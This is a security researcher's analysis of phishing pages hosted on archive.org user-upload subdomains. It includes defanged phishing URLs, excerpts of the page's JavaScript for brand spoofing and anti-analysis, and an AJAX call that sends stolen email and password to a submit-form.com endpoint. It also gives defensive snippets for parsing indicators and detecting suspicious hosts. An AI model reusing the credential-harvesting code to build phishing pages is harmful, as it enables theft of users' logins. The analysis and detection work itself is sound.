Phishing pages hosted on archive.org

    Published: 2024-02-21
    Last Updated: 2024-02-21 07:27:43 UTC
    by Jan Kopriva (Version: 1)

    The Internet Archive is a well-known and much-admired institution, devoted to creating a “digital library of Internet sites and other cultural artifacts in digital form”[1]. Through its Wayback Machine, which is accessible from https://archive.org/, one can view archived web pages from as far back as 1996. The Internet Archive functions as a memory for the web and currently holds over 800 billion web pages, as well as millions of books, audio and video recordings, and other content. Unfortunately, since it allows users to upload files, threat actors also use it from time to time to host malicious content[2,3].

    Over the last few weeks, I came across two different phishing messages that linked to archive.org.

    The URLs from both messages had a similar structure: both pointed to directories created for individual Internet Archive users, and both passed the e-mail address of the recipient to the phishing page in the same manner, as a URL fragment (the part after the “#” character):

    hxxps[:]//ia601306.us.archive[.]org/12/items/inc_20240130/inc.shtml#[name]@[domain]
    hxxps[:]//ia800207.us.archive[.]org/7/items/ries_20240215/ries.shtml#[name]@[domain]
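
For anyone triaging similar links, the structure described above can be taken apart with a few lines of JavaScript. The following is only a minimal sketch: the helper names `refang` and `recipientFromFragment` are hypothetical, and the e-mail check is deliberately loose.

```javascript
// Hypothetical helper names; not taken from the phishing page or from any existing tool.

// Turn a defanged indicator such as hxxps[:]//host[.]org/... back into a parseable URL.
function refang(defanged) {
  return defanged
    .replace(/^hxxp/i, "http")
    .replace(/\[:\]/g, ":")
    .replace(/\[\.\]/g, ".");
}

// Return the e-mail address carried in the URL fragment, or null if there is none.
function recipientFromFragment(urlString) {
  const url = new URL(urlString);
  const fragment = decodeURIComponent(url.hash.replace(/^#/, ""));
  // Deliberately loose check: something@something.tld
  return /^[^@\s]+@[^@\s]+\.[^@\s]+$/.test(fragment) ? fragment : null;
}

const sample = refang(
  "hxxps[:]//ia800207.us.archive[.]org/7/items/ries_20240215/ries.shtml#abc@isc.sans.edu"
);
console.log(new URL(sample).hostname);      // ia800207.us.archive.org
console.log(recipientFromFragment(sample)); // abc@isc.sans.edu
```

Since the fragment is processed by the browser and is not sent in the HTTP request, this kind of parsing is mainly useful for links extracted from the messages themselves, not for entries in proxy or web server logs.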

    While the link from the first message was already dead when I got to it, the second one led to a still active phishing page (this single SHTML page was the only content uploaded by the corresponding user account), which displayed a fake login window above an image of the legitimate website associated with the domain extracted from the e-mail address of the recipient.

    In the following image, you may see how it looked when the “abc@isc.sans.edu” e-mail address was provided.

    It is worth mentioning that the page used the same approach to load the logo and image of the legitimate website as a phishing page discovered by Johannes back in 2022[4], i.e., the logo was loaded using a call to clearbit.com, and the image of the website itself using a call to thum.io, as the following excerpt shows.

    ...
    
    var ind=my_email.indexOf("@");
    var my_slice=my_email.substr((ind+1));
    var c= my_slice.substr(0, my_slice.indexOf('.'));
    var final= c.toLowerCase();
    var finalu= c.toUpperCase();
    var sv = my_slice;
    
    var image = "url('https://image.thum.io/get/width/1200/https://"+sv;"')"
    
    $("#logoimg").attr("src", "https://logo.clearbit.com/"+my_slice);
    
    $("#logoimg").attr("alt", finalu);
    $("#logoname").html(finalu);
    $(".logoname").html(finalu);
    $('#logoname2').html(finalu);
    $('.logoname2').html(finalu);
    
    document.getElementById("bgimg").style.backgroundImage= image;
    
    ...
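
To make it easier to see which third-party requests the excerpt above would generate for a given recipient, its string handling can be re-created without jQuery or a DOM. This is only a sketch: the function name and the names of the returned fields are hypothetical, and only the two URL prefixes come from the excerpt.

```javascript
// Stand-alone re-creation of the excerpt's string handling (no jQuery, no DOM).
// The function name and the returned field names are hypothetical.
function derivedResources(email) {
  // Everything after the "@" (my_slice / sv in the excerpt).
  const domain = email.substring(email.indexOf("@") + 1);
  // First label of the domain (c in the excerpt).
  const label = domain.substring(0, domain.indexOf("."));
  return {
    displayName: label.toUpperCase(), // finalu in the excerpt
    logoUrl: "https://logo.clearbit.com/" + domain,
    screenshotUrl: "https://image.thum.io/get/width/1200/https://" + domain,
  };
}

console.log(derivedResources("abc@isc.sans.edu"));
```

For “abc@isc.sans.edu”, this yields the display name “ISC”, a logo request for isc.sans.edu, and a screenshot request for https://isc.sans.edu.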

    This similarity with a historical phishing page turned out not to be too surprising, since even a quick look at the HTML code of the current page showed quite clearly that it was mostly cobbled together from different pre-existing pieces of code.

    This was done in quite a clumsy manner, for example:

    • some portions of code were included twice without reason,
    • there was an attempt to display a missing image (see the picture above – it was supposed to show a “norton.png” file – probably something along the lines of “this site is safe – it was scanned by an antivirus engine”),
    • the HTML code contained a Cloudflare tracking script (this was certainly included by mistake, since it was quite useless from the standpoint of the phishing author and in any case couldn’t function correctly), and
    • there was a large section of commented-out JavaScript code, including a part which contained the same elementary “anti-analysis” functionality I wrote about back in November[5].

    ...
    
      // prevent ctrl + s
    // $(document).bind('keydown', function(e) {
    // if(e.ctrlKey && (e.which == 83)) {
    // e.preventDefault();
    // return false;
    // }
    // });
    
    // document.addEventListener('contextmenu', event => event.preventDefault());
    
    // document.onkeydown = function(e) {
    // if (e.ctrlKey && 
    // (e.keyCode === 67 || 
    // e.keyCode === 86 || 
    // e.keyCode === 85 || 
    // e.keyCode === 117)) {
    // return false;
    // } else {
    // return true;
    // }
    // };
    // $(document).keypress("u",function(e) {
    // if(e.ctrlKey)
    // {
    // return false;      }
    // else {
    // return true;
    // }});
    
    ...

    In any case, if a victim were to input their credentials and press the (somewhat sub-optimally named) “Submit Query” button, the data would be sent to a form hosted at submit-form.com, an online service that allows for easy gathering of information through forms without the need to set up any infrastructure.

    ...
    
    $.ajax({
    dataType: 'JSON',
    url: 'hxxps[:]//submit-form[.]com/8dcxPGp2',
    type: 'POST',
            data:{
              email:email,
              pwwwd:pwwwd,
                website: sv,
            },
    
    ...

    Although the two phishing messages and the page mentioned above are hardly examples of the most dangerous or sophisticated threats, they do show quite well that abuse of legitimate services by threat actors is rampant and that vigilance among users of the modern internet must be never-ending.

    It is also worth noting that even though the URLs in the phishing messages pointed to archive.org, they didn’t point to the second-level domain itself, but to fourth-level subdomains used to serve data uploaded by users. A quick test seems to indicate that the Wayback Machine itself only uses the domains archive.org, web-static.archive.org and web.archive.org to provide the historical view of the internet. If one wanted to, one could therefore easily detect, hunt for, or block attempted access to potentially malicious content uploaded to the Internet Archive by arbitrary users (i.e., in the same way as the phishing page discussed above was) by simply looking for fourth-level subdomains of archive.org (or for any archive.org subdomain besides the three mentioned above).
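
Both variants of the hostname check described above might be sketched as follows. The function names are hypothetical, and the allowlist contains only the three hosts observed in the quick test mentioned above, so it may well be incomplete.

```javascript
// Hosts observed serving Wayback Machine content in a quick test (possibly incomplete).
const WAYBACK_HOSTS = new Set(["archive.org", "web.archive.org", "web-static.archive.org"]);

// Lower-case the hostname and drop a trailing dot, if any.
function normalizeHost(hostname) {
  return hostname.toLowerCase().replace(/\.$/, "");
}

// Broad variant: true for any archive.org subdomain outside the allowlist above.
function isOtherArchiveOrgHost(hostname) {
  const host = normalizeHost(hostname);
  return host.endsWith(".archive.org") && !WAYBACK_HOSTS.has(host);
}

// Narrow variant: true only for fourth-level (or deeper) names,
// such as ia800207.us.archive.org.
function isFourthLevelArchiveOrgHost(hostname) {
  const host = normalizeHost(hostname);
  return host.endsWith(".archive.org") && host.split(".").length >= 4;
}

console.log(isFourthLevelArchiveOrgHost("ia800207.us.archive.org")); // true
console.log(isOtherArchiveOrgHost("web.archive.org"));               // false
```

The broad variant also matches any other third-level archive.org host name that may be in legitimate use, so it would probably need tuning before being used for blocking rather than for hunting.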

    It should also be mentioned that although I flagged the Internet Archive-hosted file as being used for phishing through an archive.org reporting mechanism, and also reported the use of the specific Submit Form form for malicious activities several days ago, both are unfortunately still up at the time of writing.

    [1] https://archive.org/about/
    [2] https://blog.rootshell.be/2017/04/20/archive-org-abused-deliver-phishing-pages/
    [3] https://isc.sans.edu/diary/Malicious+Content+Delivered+Through+archiveorg/27688
    [4] https://isc.sans.edu/diary/web3+phishing+via+selfcustomizing+landing+pages/28312
    [5] https://isc.sans.edu/diary/Phishing+page+with+trivial+antianalysis+features/30412

    -----------
    Jan Kopriva
    @jk0pr
    Nettles Consulting
